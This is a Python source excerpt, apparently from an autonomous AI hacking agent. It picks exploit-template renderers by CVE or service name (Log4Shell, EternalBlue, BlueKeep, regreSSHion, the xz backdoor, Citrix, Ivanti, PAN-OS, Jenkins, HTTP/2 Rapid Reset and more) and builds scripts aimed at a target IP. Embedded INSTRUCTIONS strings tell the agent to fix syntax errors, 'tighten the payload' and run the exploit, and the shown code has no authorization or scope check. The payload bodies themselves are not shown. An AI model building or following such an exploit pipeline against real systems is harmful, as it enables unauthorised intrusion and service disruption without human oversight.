        # CVE-family-specific template. Keep the surface small but
        # materially different from the generic fallback.
        cve_lower = cve.lower()
        _renderer = _render_generic_probe
        if "log4j" in cve_lower or "log4shell" in cve_lower or cve in ("cve-2021-44228", "cve-2021-45046"):
            _renderer = _render_log4j_exploit
        elif "eternalblue" in cve_lower or cve in ("cve-2017-0143", "cve-2017-0144", "cve-2017-0145", "cve-2017-0146"):
            _renderer = _render_eternalblue_template
        elif "smbghost" in cve_lower or cve == "cve-2020-0796":
            _renderer = _render_smbghost_template
        elif "bluekeep" in cve_lower or cve == "cve-2019-0708":
            _renderer = _render_bluekeep_template
        # Phase 4: new CVE-family templates (each matches by CVE ID and/or
        # service-name hint so the agent can invoke with either). Note: `cve`
        # is uppercase; compare against `cve_lower` for the exact-ID branches.
        elif cve_lower == "cve-2024-6387" or svc.lower() == "openssh":
            _renderer = _render_regresshion_template
        elif cve_lower == "cve-2024-3094" or "xz" in cve_lower:
            _renderer = _render_xz_backdoor_template
        elif cve_lower == "cve-2023-46604" or svc.lower() == "activemq":
            _renderer = _render_activemq_rce_template
        elif cve_lower == "cve-2023-22515" or svc.lower() == "confluence":
            _renderer = _render_confluence_template
        elif cve_lower in ("cve-2024-21887", "cve-2023-46805") or svc.lower() == "ivanti":
            _renderer = _render_ivanti_template
        elif cve_lower == "cve-2024-3400" or svc.lower() == "panos":
            _renderer = _render_panos_template
        elif cve_lower == "cve-2023-3519" or svc.lower() == "citrix":
            _renderer = _render_citrix_template
        elif cve_lower == "cve-2024-0204" or svc.lower() == "connectwise":
            _renderer = _render_connectwise_template
        elif cve_lower == "cve-2024-23897" or svc.lower() == "jenkins":
            _renderer = _render_jenkins_template
        elif cve_lower == "cve-2023-23752" or svc.lower() == "joomla":
            _renderer = _render_joomla_template
        elif cve_lower == "cve-2022-42889" or svc.lower() == "commons_text":
            _renderer = _render_text4shell_template
        elif cve_lower == "cve-2024-4577" or svc.lower() == "php_cgi":
            _renderer = _render_php_cgi_template
        elif cve_lower == "cve-2023-44487":
            _renderer = _render_http2_rapid_reset_template
        exploit_body = _renderer(target_ip, port_hint, svc, ver, cve)

        # Phase 4: log which dispatch branch fired so the agent can debug
        # "why did I get the generic probe for CVE-2024-6387".
        _dispatch_name = {
            _render_log4j_exploit: "log4j",
            _render_eternalblue_template: "eternalblue",
            _render_smbghost_template: "smbghost",
            _render_bluekeep_template: "bluekeep",
            _render_regresshion_template: "regresshion",
            _render_xz_backdoor_template: "xz_backdoor",
            _render_activemq_rce_template: "activemq",
            _render_confluence_template: "confluence",
            _render_ivanti_template: "ivanti",
            _render_panos_template: "panos",
            _render_citrix_template: "citrix",
            _render_connectwise_template: "connectwise",
            _render_jenkins_template: "jenkins",
            _render_joomla_template: "joomla",
            _render_text4shell_template: "text4shell",
            _render_php_cgi_template: "php_cgi",
            _render_http2_rapid_reset_template: "http2_rapid_reset",
        }.get(_renderer, "generic")
        result_lines.append(f"TEMPLATE_DISPATCHED: {_dispatch_name}")

        result_lines.append("")
        result_lines.append("--- Exploit Script Template ---")
        result_lines.append(exploit_body)

        # Self-healing PoC (Killer Feature #3): when ``poc_verification.enabled``
        # is true in config, syntax-check the synthesized template inline so
        # the agent sees the gate result before writing/running it. The agent
        # then asks the LLM to fix any syntax error and re-verify (loop is
        # driven by the agent calling ``verify_poc`` directly; this is the
        # first-pass inline check).
        try:
            from tools.poc_verifier import poc_verification_config, syntax_check

            pv_cfg = poc_verification_config(config)
            if pv_cfg["enabled"]:
                syn = syntax_check(exploit_body)
                result_lines.append("")
                result_lines.append("--- PoC Verification (syntax gate) ---")
                if syn.syntax_ok:
                    result_lines.append("SYNTAX_OK: true")
                    result_lines.append(
                        "INSTRUCTIONS: syntax verified. Use write_python_file to save, "
                        "then call verify_poc for the optional Docker compile/import gate, "
                        "then run_python_file."
                    )
                else:
                    result_lines.append("SYNTAX_OK: false")
                    result_lines.append(f"STDERR: {syn.stderr[:500]}")
                    result_lines.append(
                        "INSTRUCTIONS: the synthesized template has a syntax error. "
                        "Fix the reported error, then call verify_poc to re-check before "
                        "writing/running. Repeat up to max_retries."
                    )
        except Exception:
            # Verification is opt-in; never let it break the synth path.
            pass

        result_lines.append("")
        result_lines.append(
            "INSTRUCTIONS: Use write_python_file to save this script, "
            "review and tighten the payload for the specific CVE, then "
            "run with run_python_file."
        )

        return "\n".join(result_lines)
